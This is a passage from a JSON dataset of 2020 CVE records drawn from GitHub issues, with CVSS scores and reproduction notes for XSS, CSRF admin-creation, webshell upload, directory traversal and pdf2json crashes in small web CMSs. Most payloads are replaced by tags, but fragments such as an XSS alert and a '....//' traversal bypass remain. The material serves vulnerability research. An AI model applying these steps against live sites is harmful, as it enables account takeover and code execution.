  50982. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50983. "severity": "CRITICAL",
  50984. "baseScore": 9.8,
  50985. "impactScore": 5.9,
  50986. "exploitabilityScore": 3.9
  50987. },
  50988. {
  50989. "CVE_ID": "CVE-2020-19263",
  50990. "Issue_Url_old": "https://github.com/sansanyun/mipcms5/issues/4",
  50991. "Issue_Url_new": "https://github.com/sansanyun/mipjz/issues/4",
  50992. "Repo_new": "sansanyun/mipjz",
  50993. "Issue_Created_At": "2019-05-12T08:48:53Z",
  50994. "description": "Mipcms NUMBERTAG has a CSRF vulnerability that can add the admin user. After the administrator logs in, accessing the following two links can add an administrator user Poc address : URLTAG Add a user: http:// FILETAG FILETAG Promote user privileges to administrator privileges http:// FILETAG",
  50995. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50996. "severity": "HIGH",
  50997. "baseScore": 8.8,
  50998. "impactScore": 5.9,
  50999. "exploitabilityScore": 2.8
  51000. },
  51001. {
  51002. "CVE_ID": "CVE-2020-19265",
  51003. "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/4",
  51004. "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/4",
  51005. "Repo_new": "tifaweb/dswjcms",
  51006. "Issue_Created_At": "2019-05-14T12:59:19Z",
  51007. "description": "There is a Stored XSS vulnerability in Dswjcms NUMBERTAG A Stored XSS vulnerability exists in Dswjcms NUMBERTAG allowing a remote attacker to execute HTML or APITAG code via the PATHTAG APITAG \"> APITAG APITAG alert(/xss/) APITAG <a Add a Friendship Links FILETAG FILETAG Execute APITAG code FILETAG",
  51008. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51009. "severity": "MEDIUM",
  51010. "baseScore": 6.1,
  51011. "impactScore": 2.7,
  51012. "exploitabilityScore": 2.8
  51013. },
  51014. {
  51015. "CVE_ID": "CVE-2020-19266",
  51016. "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/5",
  51017. "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/5",
  51018. "Repo_new": "tifaweb/dswjcms",
  51019. "Issue_Created_At": "2019-05-14T13:05:03Z",
  51020. "description": "There is a Stored XSS vulnerability in Dswjcms NUMBERTAG A Stored XSS vulnerability exists in Dswjcms NUMBERTAG allowing an attacker to execute HTML or APITAG code via the PATHTAG APITAG ERRORTAG Add an article FILETAG FILETAG Execute APITAG code FILETAG",
  51021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51022. "severity": "MEDIUM",
  51023. "baseScore": 6.1,
  51024. "impactScore": 2.7,
  51025. "exploitabilityScore": 2.8
  51026. },
  51027. {
  51028. "CVE_ID": "CVE-2020-19267",
  51029. "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/7",
  51030. "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/7",
  51031. "Repo_new": "tifaweb/dswjcms",
  51032. "Issue_Created_At": "2019-05-14T13:13:23Z",
  51033. "description": "There is an Incorrect Access Control vulnerability in Dswjcms NUMBERTAG Dswjcms NUMBERTAG allowing an attacker to upload and execute arbitrary PHP code via the PATHTAG Upload PHP File Document content: APITAG FILETAG Access this PHP file FILETAG FILETAG",
  51034. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51035. "severity": "CRITICAL",
  51036. "baseScore": 9.8,
  51037. "impactScore": 5.9,
  51038. "exploitabilityScore": 3.9
  51039. },
  51040. {
  51041. "CVE_ID": "CVE-2020-19268",
  51042. "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/6",
  51043. "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/6",
  51044. "Repo_new": "tifaweb/dswjcms",
  51045. "Issue_Created_At": "2019-05-14T13:09:59Z",
  51046. "description": "There is a CSRF vulnerability in Dswjcms NUMBERTAG A CSRF vulnerability exists in Dswjcms NUMBERTAG allowing an attacker to add administrator users via the PATHTAG After the administrator user logs in, open the following page that can add an administrator user Exp: CODETAG FILETAG",
  51047. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  51048. "severity": "MEDIUM",
  51049. "baseScore": 5.7,
  51050. "impactScore": 3.6,
  51051. "exploitabilityScore": 2.1
  51052. },
  51053. {
  51054. "CVE_ID": "CVE-2020-19274",
  51055. "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/3",
  51056. "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/3",
  51057. "Repo_new": "shaogongbra/dhcms",
  51058. "Issue_Created_At": "2019-10-11T00:41:21Z",
  51059. "description": "Dhcms Stored XSS Vulnerabilities_in guestbook. Holes for details: in guestbook POST: CODETAG FILETAG you can Executed alert\u3002 FILETAG",
  51060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51061. "severity": "MEDIUM",
  51062. "baseScore": 6.1,
  51063. "impactScore": 2.7,
  51064. "exploitabilityScore": 2.8
  51065. },
  51066. {
  51067. "CVE_ID": "CVE-2020-19275",
  51068. "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/4",
  51069. "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/4",
  51070. "Repo_new": "shaogongbra/dhcms",
  51071. "Issue_Created_At": "2019-10-11T01:26:42Z",
  51072. "description": "dhcms Physical path leak. Vulnerability details NUMBERTAG Enter invalid content after the normal file, causing an error\u3002 url: URLTAG FILETAG NUMBERTAG Any file is fine, just enter invalid characters at the back\u3002 FILETAG",
  51073. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  51074. "severity": "MEDIUM",
  51075. "baseScore": 5.3,
  51076. "impactScore": 1.4,
  51077. "exploitabilityScore": 3.9
  51078. },
  51079. {
  51080. "CVE_ID": "CVE-2020-19280",
  51081. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/9",
  51082. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/9",
  51083. "Repo_new": "zchuanzhao/jeesns",
  51084. "Issue_Created_At": "2019-05-14T07:15:13Z",
  51085. "description": "Jeesns CSRF Vulnerability. There is also no token or referer check in the global filter, and there is no deletion method, so there is a CSRF vulnerability. Vulnerability reproduction NUMBERTAG First use user A (admin) to send a Weibo. FILETAG NUMBERTAG Use user B (jeesns) to comment on the Weibo and include the admin Weibo delete request in the comment. APITAG FILETAG NUMBERTAG When user A (admin) refreshes the Weibo again, the Weibo will be deleted by user A without their knowledge. FILETAG It can be seen that the CSRF TEST microblog has been deleted and the CSRF exploit is successful. There is also a CSRF vulnerability when the background administrator adds a new administrator. The poc can be constructed this way. CODETAG When the background administrator accesses this file, the user jeesns is automatically granted administrative rights.",
  51086. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51087. "severity": "HIGH",
  51088. "baseScore": 8.8,
  51089. "impactScore": 5.9,
  51090. "exploitabilityScore": 2.8
  51091. },
  51092. {
  51093. "CVE_ID": "CVE-2020-19281",
  51094. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/12",
  51095. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/12",
  51096. "Repo_new": "zchuanzhao/jeesns",
  51097. "Issue_Created_At": "2019-05-14T07:19:09Z",
  51098. "description": "Jeesns Administrator login Stored XSS. Vulnerability reproduction NUMBERTAG Open the background login page APITAG NUMBERTAG Fill in the XSS payload APITAG as the username, enter any password, and click Login. FILETAG NUMBERTAG The XSS is triggered when the administrator clicks on the member log. FILETAG",
  51099. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51100. "severity": "MEDIUM",
  51101. "baseScore": 5.4,
  51102. "impactScore": 2.7,
  51103. "exploitabilityScore": 2.3
  51104. },
  51105. {
  51106. "CVE_ID": "CVE-2020-19282",
  51107. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/11",
  51108. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/11",
  51109. "Repo_new": "zchuanzhao/jeesns",
  51110. "Issue_Created_At": "2019-05-14T07:17:46Z",
  51111. "description": "Jeesns Error Reminder Reflected XSS. Vulnerability reproduction ERRORTAG FILETAG",
  51112. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51113. "severity": "MEDIUM",
  51114. "baseScore": 6.1,
  51115. "impactScore": 2.7,
  51116. "exploitabilityScore": 2.8
  51117. },
  51118. {
  51119. "CVE_ID": "CVE-2020-19283",
  51120. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/10",
  51121. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/10",
  51122. "Repo_new": "zchuanzhao/jeesns",
  51123. "Issue_Created_At": "2019-05-14T07:16:29Z",
  51124. "description": "Jeesns APITAG Reflected XSS. Vulnerability reproduction APITAG FILETAG",
  51125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51126. "severity": "MEDIUM",
  51127. "baseScore": 6.1,
  51128. "impactScore": 2.7,
  51129. "exploitabilityScore": 2.8
  51130. },
  51131. {
  51132. "CVE_ID": "CVE-2020-19284",
  51133. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/15",
  51134. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/15",
  51135. "Repo_new": "zchuanzhao/jeesns",
  51136. "Issue_Created_At": "2019-05-14T07:22:58Z",
  51137. "description": "Jeesns Group's Comments Stored XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Fill in the group post comments with the XSS payload APITAG FILETAG NUMBERTAG The XSS is triggered when viewing posts. FILETAG",
  51138. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51139. "severity": "MEDIUM",
  51140. "baseScore": 5.4,
  51141. "impactScore": 2.7,
  51142. "exploitabilityScore": 2.3
  51143. },
  51144. {
  51145. "CVE_ID": "CVE-2020-19285",
  51146. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/14",
  51147. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/14",
  51148. "Repo_new": "zchuanzhao/jeesns",
  51149. "Issue_Created_At": "2019-05-14T07:21:20Z",
  51150. "description": "Jeesns Group Stored XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Apply for a group and fill in the name with the XSS payload APITAG FILETAG NUMBERTAG The group application needs to be reviewed, and the XSS is triggered when the background administrator views the group application. FILETAG",
  51151. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51152. "severity": "MEDIUM",
  51153. "baseScore": 5.4,
  51154. "impactScore": 2.7,
  51155. "exploitabilityScore": 2.3
  51156. },
  51157. {
  51158. "CVE_ID": "CVE-2020-19286",
  51159. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/13",
  51160. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/13",
  51161. "Repo_new": "zchuanzhao/jeesns",
  51162. "Issue_Created_At": "2019-05-14T07:20:15Z",
  51163. "description": "Jeesns Answer Stored XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Answer a question, click on the source view in the editor and fill in the XSS payload APITAG FILETAG NUMBERTAG The XSS is triggered when viewing the question. FILETAG",
  51164. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51165. "severity": "MEDIUM",
  51166. "baseScore": 5.4,
  51167. "impactScore": 2.7,
  51168. "exploitabilityScore": 2.3
  51169. },
  51170. {
  51171. "CVE_ID": "CVE-2020-19287",
  51172. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/16",
  51173. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/16",
  51174. "Repo_new": "zchuanzhao/jeesns",
  51175. "Issue_Created_At": "2019-05-14T07:24:02Z",
  51176. "description": "Jeesns Group Posts Stored XSS. Vulnerability reproduction NUMBERTAG Register a user on the front end and follow a group NUMBERTAG Post, filling in the XSS payload APITAG as the title. FILETAG NUMBERTAG The XSS is triggered when viewing group posts. FILETAG",
  51177. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51178. "severity": "MEDIUM",
  51179. "baseScore": 5.4,
  51180. "impactScore": 2.7,
  51181. "exploitabilityScore": 2.3
  51182. },
  51183. {
  51184. "CVE_ID": "CVE-2020-19288",
  51185. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/17",
  51186. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/17",
  51187. "Repo_new": "zchuanzhao/jeesns",
  51188. "Issue_Created_At": "2019-05-14T07:25:03Z",
  51189. "description": "Jeesns Message Stored XSS. Vulnerability reproduction NUMBERTAG Register a user on the front end NUMBERTAG Send a private message to the administrator, filling in the content with the XSS payload APITAG FILETAG NUMBERTAG The XSS is triggered when the administrator views the private message. FILETAG",
  51190. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51191. "severity": "MEDIUM",
  51192. "baseScore": 5.4,
  51193. "impactScore": 2.7,
  51194. "exploitabilityScore": 2.3
  51195. },
  51196. {
  51197. "CVE_ID": "CVE-2020-19289",
  51198. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/18",
  51199. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/18",
  51200. "Repo_new": "zchuanzhao/jeesns",
  51201. "Issue_Created_At": "2019-05-14T07:26:07Z",
  51202. "description": "Jeesns Album Stored XSS. Vulnerability reproduction NUMBERTAG Register a user, open the personal center, and click on the gallery NUMBERTAG Create a new album and fill in the XSS payload APITAG . FILETAG NUMBERTAG The XSS is triggered when viewing the album. FILETAG",
  51203. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51204. "severity": "MEDIUM",
  51205. "baseScore": 5.4,
  51206. "impactScore": 2.7,
  51207. "exploitabilityScore": 2.3
  51208. },
  51209. {
  51210. "CVE_ID": "CVE-2020-19290",
  51211. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/20",
  51212. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/20",
  51213. "Repo_new": "zchuanzhao/jeesns",
  51214. "Issue_Created_At": "2019-05-14T07:28:13Z",
  51215. "description": "Jeesns Weibo Comments Stored XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Fill in the XSS payload APITAG in the Weibo comment section. FILETAG NUMBERTAG The XSS is triggered when viewing the details of the Weibo. FILETAG",
  51216. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51217. "severity": "MEDIUM",
  51218. "baseScore": 5.4,
  51219. "impactScore": 2.7,
  51220. "exploitabilityScore": 2.3
  51221. },
  51222. {
  51223. "CVE_ID": "CVE-2020-19291",
  51224. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/19",
  51225. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/19",
  51226. "Repo_new": "zchuanzhao/jeesns",
  51227. "Issue_Created_At": "2019-05-14T07:27:13Z",
  51228. "description": "Jeesns Weibo Stored XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Post a Weibo and fill in the XSS payload APITAG . FILETAG NUMBERTAG The XSS is triggered when viewing the Weibo. FILETAG",
  51229. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51230. "severity": "MEDIUM",
  51231. "baseScore": 5.4,
  51232. "impactScore": 2.7,
  51233. "exploitabilityScore": 2.3
  51234. },
  51235. {
  51236. "CVE_ID": "CVE-2020-19292",
  51237. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/24",
  51238. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/24",
  51239. "Repo_new": "zchuanzhao/jeesns",
  51240. "Issue_Created_At": "2019-05-14T07:31:22Z",
  51241. "description": "Jeesns Question Stored XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Post a question and fill in the XSS payload APITAG . FILETAG NUMBERTAG The XSS is triggered when viewing the question. FILETAG",
  51242. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51243. "severity": "MEDIUM",
  51244. "baseScore": 5.4,
  51245. "impactScore": 2.7,
  51246. "exploitabilityScore": 2.3
  51247. },
  51248. {
  51249. "CVE_ID": "CVE-2020-19293",
  51250. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/22",
  51251. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/22",
  51252. "Repo_new": "zchuanzhao/jeesns",
  51253. "Issue_Created_At": "2019-05-14T07:29:48Z",
  51254. "description": "Jeesns Article Stored XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Post an article and fill in the XSS payload APITAG . FILETAG NUMBERTAG Posting an article requires review, and the XSS is triggered when the background administrator views the article. FILETAG",
  51255. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51256. "severity": "MEDIUM",
  51257. "baseScore": 5.4,
  51258. "impactScore": 2.7,
  51259. "exploitabilityScore": 2.3
  51260. },
  51261. {
  51262. "CVE_ID": "CVE-2020-19294",
  51263. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/23",
  51264. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/23",
  51265. "Repo_new": "zchuanzhao/jeesns",
  51266. "Issue_Created_At": "2019-05-14T07:30:33Z",
  51267. "description": "Jeesns Article Comments Stored XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Fill in the article comments with the XSS payload APITAG FILETAG NUMBERTAG The XSS is triggered when viewing the article. FILETAG",
  51268. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51269. "severity": "MEDIUM",
  51270. "baseScore": 5.4,
  51271. "impactScore": 2.7,
  51272. "exploitabilityScore": 2.3
  51273. },
  51274. {
  51275. "CVE_ID": "CVE-2020-19295",
  51276. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/21",
  51277. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/21",
  51278. "Repo_new": "zchuanzhao/jeesns",
  51279. "Issue_Created_At": "2019-05-14T07:28:52Z",
  51280. "description": "Jeesns Weibo Topic Reflected XSS. Vulnerability reproduction APITAG FILETAG",
  51281. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51282. "severity": "MEDIUM",
  51283. "baseScore": 6.1,
  51284. "impactScore": 2.7,
  51285. "exploitabilityScore": 2.8
  51286. },
  51287. {
  51288. "CVE_ID": "CVE-2020-19301",
  51289. "Issue_Url_old": "https://github.com/tingyuu/vaeThink/issues/1",
  51290. "Issue_Url_new": "https://github.com/tingyuu/vaethink/issues/1",
  51291. "Repo_new": "tingyuu/vaethink",
  51292. "Issue_Created_At": "2019-05-14T13:00:14Z",
  51293. "description": "There is an Arbitrary Code Execution Vulnerability. Vulnerability description: There is a vulnerability which allows remote attackers to execute arbitrary code. The user can control the value of the field 'condition' of the database table 'vae_admin_rule', which is used for the parameters of the code execution function in the administrator privilege check module. Payload: ERRORTAG POC: Firstly, we put the payload into the place as follows: FILETAG Then we create a new role group, which has limited privileges: FILETAG And we create a user that belongs to this role group: FILETAG We login as 'test', and it's obvious that user 'test' has no privilege to access any page: FILETAG But the payload has been executed when the system checked the privileges: FILETAG FILETAG",
  51294. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51295. "severity": "CRITICAL",
  51296. "baseScore": 9.8,
  51297. "impactScore": 5.9,
  51298. "exploitabilityScore": 3.9
  51299. },
  51300. {
  51301. "CVE_ID": "CVE-2020-19302",
  51302. "Issue_Url_old": "https://github.com/tingyuu/vaeThink/issues/2",
  51303. "Issue_Url_new": "https://github.com/tingyuu/vaethink/issues/2",
  51304. "Repo_new": "tingyuu/vaethink",
  51305. "Issue_Created_At": "2019-05-14T13:14:44Z",
  51306. "description": "There is an Arbitrary File Upload Vulnerability. Vulnerability description: There is an arbitrary file upload vulnerability which allows remote attackers to execute arbitrary code. The server does not validate the file extension in the administrator avatar upload function. POC: FILETAG FILETAG We change the filename to \"t.php\": FILETAG The webshell has been uploaded: FILETAG FILETAG",
  51307. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51308. "severity": "CRITICAL",
  51309. "baseScore": 9.8,
  51310. "impactScore": 5.9,
  51311. "exploitabilityScore": 3.9
  51312. },
  51313. {
  51314. "CVE_ID": "CVE-2020-19303",
  51315. "Issue_Url_old": "https://github.com/houdunwang/hdcms/issues/6",
  51316. "Issue_Url_new": "https://github.com/houdunwang/hdcms/issues/6",
  51317. "Repo_new": "houdunwang/hdcms",
  51318. "Issue_Created_At": "2019-06-29T01:16:39Z",
  51319. "description": "There is an Arbitrary Code Execution vulnerability. In hdcms NUMBERTAG an attacker can upload a malicious file via PATHTAG, which leads to an Arbitrary Code Execution vulnerability. FILETAG FILETAG FILETAG",
  51320. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51321. "severity": "HIGH",
  51322. "baseScore": 7.8,
  51323. "impactScore": 5.9,
  51324. "exploitabilityScore": 1.8
  51325. },
  51326. {
  51327. "CVE_ID": "CVE-2020-19304",
  51328. "Issue_Url_old": "https://github.com/MRdoulestar/CodeAnalyse/issues/1",
  51329. "Issue_Url_new": "https://github.com/mrdoulestar/codeanalyse/issues/1",
  51330. "Repo_new": "mrdoulestar/codeanalyse",
  51331. "Issue_Created_At": "2020-01-15T02:46:02Z",
  51332. "description": "APITAG NUMBERTAG Directory Traversal. Vulnerability Name: Metinfo CMS Background Directory Traversal Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG The developer uses str_replace to delete '../' in APITAG , but this is not safe enough because it can be bypassed by PATHTAG or '....//'. FILETAG Payload FILETAG FILETAG",
  51333. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  51334. "severity": "HIGH",
  51335. "baseScore": 7.5,
  51336. "impactScore": 3.6,
  51337. "exploitabilityScore": 3.9
  51338. },
  51339. {
  51340. "CVE_ID": "CVE-2020-19305",
  51341. "Issue_Url_old": "https://github.com/MRdoulestar/CodeAnalyse/issues/2",
  51342. "Issue_Url_new": "https://github.com/mrdoulestar/codeanalyse/issues/2",
  51343. "Repo_new": "mrdoulestar/codeanalyse",
  51344. "Issue_Created_At": "2020-01-15T03:10:45Z",
  51345. "description": "APITAG NUMBERTAG Arbitrary File Deletion. Vulnerability Name: Metinfo CMS Arbitrary File Deletion Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG The indeximg field is also deleted when the column is deleted in ERRORTAG , and the indeximg field can be arbitrarily specified by the background user (in the function of adding a column picture). FILETAG FILETAG POC FILETAG ERRORTAG Then we delete the column, and the file will be deleted as well. FILETAG",
  51346. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51347. "severity": "CRITICAL",
  51348. "baseScore": 9.8,
  51349. "impactScore": 5.9,
  51350. "exploitabilityScore": 3.9
  51351. },
  51352. {
  51353. "CVE_ID": "CVE-2020-19463",
  51354. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/24",
  51355. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/24",
  51356. "Repo_new": "flexpaper/pdf2json",
  51357. "Issue_Created_At": "2019-05-27T22:42:03Z",
  51358. "description": "Segmentation fault (stack overflow) on vfprintf. Hi, Our fuzzer found a crash due to a stack overflow bug on the function vfprintf. APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error: End of file inside array Error: End of file inside dictionary Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string ... 
Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG IO_default_xsputn APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR 
SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51359. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51360. "severity": "MEDIUM",
  51361. "baseScore": 5.5,
  51362. "impactScore": 3.6,
  51363. "exploitabilityScore": 1.8
  51364. },
  51365. {
  51366. "CVE_ID": "CVE-2020-19464",
  51367. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/25",
  51368. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/25",
  51369. "Repo_new": "flexpaper/pdf2json",
  51370. "Issue_Created_At": "2019-05-27T22:46:07Z",
  51371. "description": "Segmentation fault (stack overflow) on APITAG Hi, Our fuzzer found a crash due to a stack overflow bug on the function APITAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json PATHTAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F7AB: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) 